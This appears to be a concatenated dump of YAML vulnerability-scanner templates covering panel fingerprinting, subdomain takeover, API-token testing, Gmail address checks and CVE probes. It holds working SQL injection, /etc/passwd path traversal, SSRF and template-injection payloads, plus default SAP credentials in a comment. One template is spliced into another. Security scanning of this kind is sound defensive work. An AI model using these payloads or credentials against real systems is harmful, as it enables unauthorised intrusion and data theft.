https://www.exploit-db.com/ghdb/6892 9 | tags: panel,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}' 15 | matchers: 16 | - type: word 17 | words: 18 | - "ShareCenter" 19 | - "Please Select Your Account" 20 | condition: and 21 | -------------------------------------------------------------------------------- /xxljob-admin-detect.yaml: -------------------------------------------------------------------------------- 1 | id: xxljob-admin-detect 2 | 3 | info: 4 | name: XXLJOB Admin Login 5 | author: pdteam 6 | severity: info 7 | tags: tech,xxljob 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xxl-job-admin/toLogin" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - "XXLJOB" 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /api/api-fastly.yaml: -------------------------------------------------------------------------------- 1 | id: api-fastly 2 | 3 | info: 4 | name: Fastly API Test 5 | author: Adam Crosser 6 | reference: https://developer.fastly.com/reference/api/ 7 | severity: info 8 | tags: token-spray,fastly 9 | 10 | self-contained: true 11 | requests: 12 | - method: GET 13 | path: 14 | - "https://api.fastly.com/service" 15 | headers: 16 | Fastly-Key: "{{token}}" 17 | 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /api/strapi-panel.yaml: -------------------------------------------------------------------------------- 1 | id: strapi-panel 2 | 3 | info: 4 | name: Strapi Login Panel 5 | author: idealphase 6 | severity: info 7 | tags: panel,strapi,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/admin/auth/login' 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - "Strapi Admin" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | 
-------------------------------------------------------------------------------- /basic-auth-detection.yaml: -------------------------------------------------------------------------------- 1 | id: basic-auth-detection 2 | 3 | info: 4 | name: Basic auth detection 5 | author: w4cky_ 6 | severity: low 7 | tags: tech,basic-auth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 401 19 | 20 | - type: word 21 | words: 22 | - "Www-Authenticate:" 23 | part: header 24 | -------------------------------------------------------------------------------- /c-unauthorized/spark-api-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: spark-api-unauth 2 | 3 | info: 4 | name: spark Api Unauth 5 | author: betta(https://github.com/betta-cyber) 6 | severity: high 7 | verified: false 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /v1/submissions 14 | expression: response.status == 400 && response.body.bcontains(b"Missing an action") && response.body.bcontains(b"serverSparkVersion") 15 | expression: r0() -------------------------------------------------------------------------------- /cve/2019/CVE-2019-18394.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-18394 2 | 3 | info: 4 | name: Openfire Full Read SSRF 5 | author: su(https://suzzz112113.github.io/#blog) 6 | severity: critical 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /getFavicon?host=baidu.com/? 
13 | expression: response.status == 200 && response.content_type.contains("image/x-icon") && response.body.bcontains(bytes("baidu.com")) 14 | expression: r0() 15 | 16 | -------------------------------------------------------------------------------- /dreambox-detect.yaml: -------------------------------------------------------------------------------- 1 | id: dreambox-detect 2 | 3 | info: 4 | name: DreamBox Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: dreambox,tech 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | part: body 22 | words: 23 | - 'Dreambox WebControl' 24 | -------------------------------------------------------------------------------- /e-vulnerability/dedecms-url-redirection.yaml: -------------------------------------------------------------------------------- 1 | id: dedecms-url-redirection 2 | 3 | info: 4 | name: DedeCMS URL Redirection 5 | author: cc_ci(https://github.com/cc8ci) 6 | severity: low 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D 13 | expression: response.status == 302 && response.headers["location"] == "http://www.baidu.com" 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /e-vulnerability/docker-registry.yaml: -------------------------------------------------------------------------------- 1 | id: docker-registry 2 | 3 | info: 4 | name: Docker Registry Listing 5 | author: zan8in 6 | severity: medium 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /v2/_catalog 13 | follow_redirects: true 14 | expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b'"repositories":') 15 | expression: r0() 16 | 17 | 
-------------------------------------------------------------------------------- /ems-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: ems-login-panel 2 | 3 | info: 4 | name: EMS Login page detection 5 | author: __Fazal 6 | severity: info 7 | tags: panel,ems,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/EMSWebClient/Login.aspx' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "EMS Web Client - Login" 23 | -------------------------------------------------------------------------------- /instagram.yaml: -------------------------------------------------------------------------------- 1 | id: api-instagramgraph 2 | 3 | info: 4 | name: Instagram Graph API Test 5 | author: zzeitlin 6 | reference: https://developers.facebook.com/docs/instagram-api/getting-started 7 | severity: info 8 | tags: token-spray,instagram,graph 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /jaspersoft-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jaspersoft-detect 2 | 3 | info: 4 | name: Jaspersoft detected 5 | author: koti2 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/jasperserver/login.html?error=1" 12 | matchers: 13 | - type: word 14 | words: 15 | - "TIBCO Jaspersoft: Login" 16 | - "Could not login to JasperReports Server" 17 | - "About TIBCO JasperReports Server" 18 | condition: or 19 | -------------------------------------------------------------------------------- /lokalise.yaml: -------------------------------------------------------------------------------- 1 | id: api-lokalise 2 | 3 | info: 4 | name: 
Lokalise API Test 5 | author: zzeitlin 6 | reference: https://app.lokalise.com/api2docs/curl/#resource-projects 7 | severity: info 8 | tags: token-spray,lokalise 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.lokalise.com/api2/projects/" 14 | headers: 15 | X-Api-Token: "{{token}}" 16 | 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /microsoft-teams-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: microsoft-teams-webhook 2 | 3 | info: 4 | name: Microsoft Teams Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token,microsoft 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'https://outlook\.office\.com/webhook/[A-Za-z0-9\-@]+/IncomingWebhook/[A-Za-z0-9\-]+/[A-Za-z0-9\-]+' 18 | -------------------------------------------------------------------------------- /octoprint-login.yaml: -------------------------------------------------------------------------------- 1 | id: octoprint-panel 2 | 3 | info: 4 | name: OctoPrint Login 5 | author: affix 6 | severity: info 7 | tags: octoprint,panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/login/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'OctoPrint Login' 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /openerp-database.yaml: -------------------------------------------------------------------------------- 1 | id: openerp-database 2 | 3 | info: 4 | name: OpenERP database instances 5 | author: impramodsargar 6 | severity: info 7 | tags: openerp,panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/web/database/selector/" 13 | 14 | matchers-condition: and 15 
| matchers: 16 | - type: word 17 | words: 18 | - 'Odoo' 19 | 20 | - type: status 21 | status: 22 | - 200 -------------------------------------------------------------------------------- /sap-netweaver-portal.yaml: -------------------------------------------------------------------------------- 1 | id: sap-netweaver-portal 2 | 3 | # SAP Netweaver default creds - SAP*/06071992 or TMSADM/$1Pawd2& 4 | 5 | info: 6 | name: SAP NetWeaver Portal 7 | author: organiccrap 8 | severity: info 9 | tags: panel,sap 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/irj/portal" 15 | matchers: 16 | - type: word 17 | words: 18 | - "SAP NetWeaver Portal" 19 | part: body 20 | -------------------------------------------------------------------------------- /valid-gmail-check.yaml: -------------------------------------------------------------------------------- 1 | id: valid-gmail-checker 2 | 3 | info: 4 | name: Valid Google Mail Checker 5 | author: dievus,dwisiswant0 6 | severity: info 7 | reference: 8 | - https://github.com/dievus/geeMailUserFinder 9 | 10 | self-contained: true 11 | requests: 12 | - method: HEAD 13 | path: 14 | - "https://mail.google.com/mail/gxlu?email={{email}}" 15 | 16 | matchers: 17 | - type: word 18 | part: header 19 | words: 20 | - "COMPASS" -------------------------------------------------------------------------------- /webflow-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: webflow-takeover 2 | 3 | info: 4 | name: webflow takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | -

The page you are looking for doesn't exist or has been moved.

-------------------------------------------------------------------------------- /wufoo-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: wufoo-takeover 2 | 3 | info: 4 | name: wufoo takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Profile not found 20 | - Hmmm....something is not right. 21 | condition: and -------------------------------------------------------------------------------- /zenario-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: zenario-login-panel 2 | 3 | info: 4 | name: Zenario Admin login 5 | author: __Fazal 6 | severity: info 7 | tags: panel,zenario 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/zenario/admin/welcome.php' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "Welcome to Zenario" 23 | -------------------------------------------------------------------------------- /a-fingerprinting/sonicwall-sslvpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sonicwall-sslvpn-panel 2 | 3 | info: 4 | name: SonicWall Virtual Office SSLVPN Panel 5 | author: PR3R00T 6 | severity: info 7 | verified: true 8 | description: | 9 | shodan: http.title:"Virtual Office" 10 | 11 | rules: 12 | r0: 13 | request: 14 | method: GET 15 | path: /cgi-bin/welcome 16 | expression: response.status == 200 && response.body.bcontains(b'Virtual Office') 17 | expression: r0() -------------------------------------------------------------------------------- /a-fingerprinting/zentao-detect.yaml: -------------------------------------------------------------------------------- 1 | id: 
zentao-detect 2 | 3 | info: 4 | name: Zentao detect 5 | author: pikpikcu 6 | severity: info 7 | verified: true 8 | 9 | rules: 10 | r0: 11 | request: 12 | method: GET 13 | path: /zentao/index.php?mode=getconfig 14 | expression: response.status == 200 && response.body.bcontains(b'"sessionName":"zentaosid"') && response.body.bcontains(b'{"version":"') && "\"version\":\"([v0-9.]+)\"".bmatches(response.body) 15 | expression: r0() -------------------------------------------------------------------------------- /aftership-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: aftership-takeover 2 | 3 | info: 4 | name: Aftership Takeover Detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - Oops.

The page you're looking for doesn't exist. -------------------------------------------------------------------------------- /amazon-docker-config-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: amazon-docker-config-disclosure 2 | 3 | info: 4 | name: Dockerrun AWS Configuration Exposure 5 | author: pdteam 6 | severity: medium 7 | tags: config,exposure,aws,devops 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/Dockerrun.aws.json' 13 | matchers: 14 | - type: word 15 | words: 16 | - 'AWSEBDockerrunVersion' 17 | - 'containerDefinitions' 18 | condition: and 19 | -------------------------------------------------------------------------------- /calendly.yaml: -------------------------------------------------------------------------------- 1 | id: api-calendly 2 | 3 | info: 4 | name: Calendly API Test 5 | author: zzeitlin 6 | reference: https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me 7 | severity: info 8 | tags: token-spray,calendly 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://calendly.com/api/v1/users/me" 14 | headers: 15 | X-Token: "{{token}}" 16 | 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | -------------------------------------------------------------------------------- /code42-panel.yaml: -------------------------------------------------------------------------------- 1 | id: code42-panel 2 | 3 | info: 4 | name: Code42 Panel 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel,code42 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/404' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: dsl 17 | dsl: 18 | - 'status_code == 404' 19 | 20 | - type: word 21 | words: 22 | - "Code42 homepage" 23 | -------------------------------------------------------------------------------- /crush-ftp-detect.yaml: -------------------------------------------------------------------------------- 1 | id: 
crush-ftp-detect 2 | 3 | info: 4 | name: Crush FTP 5 | author: pussycat0x 6 | severity: info 7 | tags: tech,ftp 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/WebInterface/login.html" 12 | 13 | redirects: true 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "CrushFTP WebInterface" 19 | - type: status 20 | status: 21 | - 200 -------------------------------------------------------------------------------- /cve/2015/CVE-2015-7297.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2015-7297 2 | 3 | info: 4 | name: Joomla Core SQL Injection 5 | author: unkown 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1) 13 | expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2") 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /cve/2018/CVE-2018-7490.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-7490 2 | 3 | info: 4 | name: uWSGI PHP Plugin Directory Traversal 5 | author: unkown 6 | severity: high 7 | 8 | rules: 9 | r0: 10 | request: 11 | method: GET 12 | path: /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd 13 | expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body) 14 | expression: r0() 15 | -------------------------------------------------------------------------------- /edgeos-login.yaml: -------------------------------------------------------------------------------- 1 | id: edgeos-login 2 | 3 | info: 4 | name: EdgeOS login Detect 5 | author: princechaddha 6 | severity: info 7 | tags: login,tech,edgeos,edgemax 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 
| matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - 'EdgeOS' 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /fuelcms-panel.yaml: -------------------------------------------------------------------------------- 1 | id: fuelcms-panel 2 | 3 | info: 4 | name: Fuel CMS Panel 5 | author: Adam Crosser 6 | severity: info 7 | tags: panel,fuelcms,oss 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/fuel/login" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - "FUEL CMS" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /google/google-mapsembedadvanced.yaml: -------------------------------------------------------------------------------- 1 | id: api-googlemapsembedadvanced 2 | 3 | info: 4 | name: Google Maps Embed (Advanced) API Test 5 | author: zzeitlin 6 | severity: info 7 | tags: token-spray,google,maps,embed 8 | 9 | self-contained: true 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://www.google.com/maps/embed/v1/search?q=record+stores+in+Seattle&key={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /hivemanager-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: hivemanager-login-panel 2 | 3 | info: 4 | name: HiveManager Login panel 5 | author: binaryfigments 6 | severity: info 7 | tags: panel,hivemanager,login 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/hm/login.action' 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - "HiveManager Login" 18 | - type: status 19 | status: 20 | - 200 21 | 
-------------------------------------------------------------------------------- /jira-unauthenticated-projects.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-projects 2 | 3 | info: 4 | name: Jira Unauthenticated Projects 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/api/2/project?maxResults=100" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'projects' 17 | - 'startAt' 18 | - 'maxResults' 19 | condition: and 20 | -------------------------------------------------------------------------------- /mapbox.yaml: -------------------------------------------------------------------------------- 1 | id: api-mapbox 2 | 3 | info: 4 | name: Mapbox API Test 5 | author: zzeitlin 6 | reference: https://docs.mapbox.com/api/search/geocoding/ 7 | severity: info 8 | tags: token-spray,mapbox 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://api.mapbox.com/geocoding/v5/mapbox.places/Los%20Angeles.json?access_token={{token}}" 14 | 15 | matchers: 16 | - type: status 17 | status: 18 | - 401 19 | negative: true 20 | -------------------------------------------------------------------------------- /medium-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: medium-takeover 2 | 3 | info: 4 | name: Medium Takeover Detection 5 | author: rtcms 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/206 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Oops! 
We couldn’t find that page 19 | - Sorry about that 20 | condition: and -------------------------------------------------------------------------------- /netscaler-aaa-login.yaml: -------------------------------------------------------------------------------- 1 | id: netscaler-aaa-login 2 | 3 | info: 4 | name: NetScaler AAA Login Panel 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: 8 | - https://www.exploit-db.com/ghdb/6898 9 | tags: panel,netscaler,login 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/logon/LogonPoint/tmindex.html' 15 | matchers: 16 | - type: word 17 | words: 18 | - "NetScaler AAA" 19 | condition: and 20 | -------------------------------------------------------------------------------- /php/phpmyadmin-panel-1.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-panel1 2 | 3 | info: 4 | name: phpMyAdmin Panel 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /phpmyadmin/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | words: 19 | - "phpMyAdmin" -------------------------------------------------------------------------------- /php/phpmyadmin-panel-3.yaml: -------------------------------------------------------------------------------- 1 | id: phpmyadmin-panel3 2 | 3 | info: 4 | name: phpMyAdmin Panel 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | 10 | requests: 11 | - raw: 12 | - | 13 | GET /_phpmyadmin/ HTTP/1.1 14 | Host: {{Hostname}} 15 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) 16 | matchers: 17 | - type: word 18 | words: 19 | - "phpMyAdmin" -------------------------------------------------------------------------------- /proposify-takeover.yaml: 
-------------------------------------------------------------------------------- 1 | id: proposify-takeover 2 | 3 | info: 4 | name: proposify takeover detection 5 | author: pdteam 6 | severity: high 7 | reference: 8 | - https://github.com/EdOverflow/can-i-take-over-xyz 9 | tags: takeover 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - If you need immediate assistance, please contact Welcome to your Strapi app' 20 | condition: and 21 | -------------------------------------------------------------------------------- /asana.yaml: -------------------------------------------------------------------------------- 1 | id: api-asana 2 | 3 | info: 4 | name: Asana API Test 5 | author: zzeitlin 6 | reference: https://developers.asana.com/docs/using-terminal 7 | severity: info 8 | tags: token-spray,asana 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "https://app.asana.com/api/1.0/users/me" 14 | headers: 15 | Authorization: Bearer {{token}} 16 | 17 | matchers: 18 | - type: status 19 | status: 20 | - 401 21 | negative: true 22 | -------------------------------------------------------------------------------- /cve/2018/CVE-2018-10736.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-10736 2 | 3 | info: 4 | name: Nagios XI SQL Inject 5 | author: 0x_zmz(github.com/0x-zmz) 6 | severity: high 7 | 8 | set: 9 | r: randomInt(2000000000, 2100000000) 10 | rules: 11 | r0: 12 | request: 13 | method: GET 14 | path: /nagiosql/admin/info.php?key1=%27%20union%20select%20concat(md5({{r}}))%23 15 | expression: response.body.bcontains(bytes(md5(string(r)))) 16 | expression: r0() 17 | 18 | -------------------------------------------------------------------------------- /cve/2019/CVE-2019-11510.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-11510 2 | 3 | info: 4 | name: Pulse Connect Secure SSL VPN 
Arbitrary File Read
  author: leezp
  severity: critical

# NOTE(review): only the tail of this template is visible here (its id/name header is in the
# preceding chunk). The rule requests a traversal path and treats a 200 whose body matches an
# /etc/passwd-style line as confirmation; a patched target should return 4xx for this request.
rules:
  r0:
    request:
      method: GET
      path: /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

# -------------------------------------------------------------------------------- /e-vulnerability/consul-rexec-rce.yaml: --------------------------------------------------------------------------------
# Reads the unauthenticated Consul agent self-info endpoint and reports when the JSON body
# advertises "DisableRemoteExec": false, i.e. remote exec is still enabled on an exposed agent.
# Remediation is to set disable_remote_exec and to put the agent HTTP API behind ACLs/network controls.
id: consul-rexec-rce

info:
  name: Consul rexec RCE
  author: imlonghao(https://imlonghao.com/)
  severity: high
  verified: false

rules:
  r0:
    request:
      method: GET
      path: /v1/agent/self
    expression: 'response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"\"DisableRemoteExec\": false")'
expression: r0()

# -------------------------------------------------------------------------------- /e-vulnerability/duomicms-sqli.yaml: --------------------------------------------------------------------------------
# Error-based SQL injection check against ajax.php; the match is a fixed 32-hex digest expected
# to be reflected in the error output.
# NOTE(review): unlike fangweicms-sqli / maccms-rce below, the expected digest is hard-coded instead of
# derived from a per-run randomInt() value, so a static page that happens to contain this string would
# also match; consider the set:/randomInt pattern the sibling templates use.
id: duomicms-sqli

info:
  name: Duomicms sqli
  author: hanxiansheng26(https://github.com/hanxiansheng26)
  severity: high

rules:
  r0:
    request:
      method: GET
      path: /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(2000000005)))
    expression: response.body.bcontains(b"fc9bdfb86bae5c322bae5acd78760935")
expression: r0()

# -------------------------------------------------------------------------------- /e-vulnerability/fangweicms-sqli.yaml: --------------------------------------------------------------------------------
# UNION-based SQL injection check; a random integer is generated per run and its md5 must be echoed
# back, which keeps the match specific to this request rather than to static page content.
id: fangweicms-sqli

info:
  name: FangweiCMS sqli
  author: Rexus
  severity: high

set:
  rand: randomInt(200000000, 210000000)
rules:
  r0:
    request:
      method: GET
      path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23
    expression: response.body.bcontains(bytes(md5(string(rand))))
expression: r0()

# -------------------------------------------------------------------------------- /e-vulnerability/maccms-rce.yaml: --------------------------------------------------------------------------------
# Template-injection check on the vod-search parameter; confirmation is the md5 of a per-run random
# value appearing in the body. Severity is critical because the match implies server-side code execution.
id: maccms-rce

info:
  name: Maccms RCE
  author: hanxiansheng26(https://github.com/hanxiansheng26)
  severity: critical

set:
  r: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      method: GET
      path: /index.php?m=vod-search&wd={if-A:printf(md5({{r}}))}{endif-A}
    expression: response.body.bcontains(bytes(md5(string(r))))
expression: r0()

# -------------------------------------------------------------------------------- /e-vulnerability/msvod-sqli.yaml: --------------------------------------------------------------------------------
# Error-based SQL injection check. Only the first 31 characters of the digest are compared, presumably
# because the error text carrying it is length-limited and the 0x7c prefix consumes one character — TODO confirm.
# NOTE(review): the path contains raw spaces and parentheses; whether the engine percent-encodes them
# before sending is engine-defined, so verify the request on the wire.
id: msvod-sqli

info:
  name: msvod sqli
  author: jinqi
  severity: high

set:
  r1: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      method: GET
      path: /images/lists?cid=1 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,md5({{r1}}))) desc --+a
    expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
expression: r0()

# -------------------------------------------------------------------------------- /e-vulnerability/nuuo-file-inclusion.yaml: --------------------------------------------------------------------------------
# Local file inclusion check: asks css_parser.php to include its own source and matches when PHP
# source text ($_GET['css']) is served back with a text/css content type.
id: nuuo-file-inclusion

info:
  name: Nuuo file inclusion
  author: 2357000166(https://github.com/2357000166)
  severity: high

rules:
  r0:
    request:
      method: GET
      path: /css_parser.php?css=css_parser.php
    expression: response.status == 200 && response.headers["content-type"] == "text/css" && response.body.bcontains(b"$_GET['css']")
expression: r0()

# -------------------------------------------------------------------------------- /exposed-hg.yaml: --------------------------------------------------------------------------------
# Detects a web-served Mercurial repository by fetching .hg/hgrc; both "[paths]" and "default"
# must appear (condition: and) together with a 200. Exposed VCS metadata commonly leaks remote URLs
# and sometimes credentials, so the fix is to deny access to .hg/ at the web server.
id: exposed-hg

info:
  name: Exposed HG Directory
  author: daffainfo
  severity: low
  tags: config,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/.hg/hgrc"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "[paths]"
          - "default"
        condition: and

      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /exsi-system.yaml: --------------------------------------------------------------------------------
# Fingerprints the ESXi host client UI by its Angular app marker.
# NOTE(review): "#/login" is a URL fragment; HTTP clients normally do not transmit fragments, so the
# request on the wire is most likely just /ui/ — harmless here, but worth confirming for the engine in use.
# The id/filename spelling "exsi" is kept as-is because other references may depend on it.
id: exsi-system

info:
  name: ESXi System
  author: dhiyaneshDK
  severity: info
  metadata:
    shodan-query: html:"esxUiApp"
  tags: panel,esxi

requests:
  - method: GET
    path:
      - '{{BaseURL}}/ui/#/login'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'ng-app="esxUiApp"'
      - type: status
        status:
          - 200
# -------------------------------------------------------------------------------- /frontify-takeover.yaml: --------------------------------------------------------------------------------
# Dangling-DNS check: a host that still CNAMEs to Frontify but has no project there returns the
# provider's not-found page; both phrases must be present (condition: and).
# NOTE(review): there is no status or DNS (CNAME) matcher, so the template relies on body text alone;
# a confirming CNAME check would reduce false positives from pages that merely quote these strings.
id: frontify-takeover

info:
  name: frontify takeover detection
  author: pdteam
  severity: high
  reference:
    - https://github.com/EdOverflow/can-i-take-over-xyz
  tags: takeover

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - 404 - Page Not Found
          - Oops… looks like you got lost
        condition: and
# -------------------------------------------------------------------------------- /gradle-enterprise-panel.yaml: --------------------------------------------------------------------------------
# Panel fingerprint for Gradle Enterprise; follows up to two redirects so a root URL that bounces
# to the login page still matches. No status matcher is declared, only the body word.
id: gradle-enterprise-panel

info:
  name: Gradle Enterprise Panel Detect
  author: Adam Crosser
  severity: info
  tags: panel,gradle

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Gradle Enterprise"

# -------------------------------------------------------------------------------- /node-red-detect.yaml: --------------------------------------------------------------------------------
# Fingerprints a Node-RED editor/dashboard at the site root (body word + 200).
id: node-red-detect

info:
  name: Node RED Detect
  author: pikpikcu
  severity: info
  tags: tech,apache,node-red-dashboard

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Node-RED"

      - type: status
        status:
          - 200

# -------------------------------------------------------------------------------- /npm-log-file.yaml: --------------------------------------------------------------------------------
# Detects a publicly served npm-debug.log; these logs can contain registry URLs, paths and
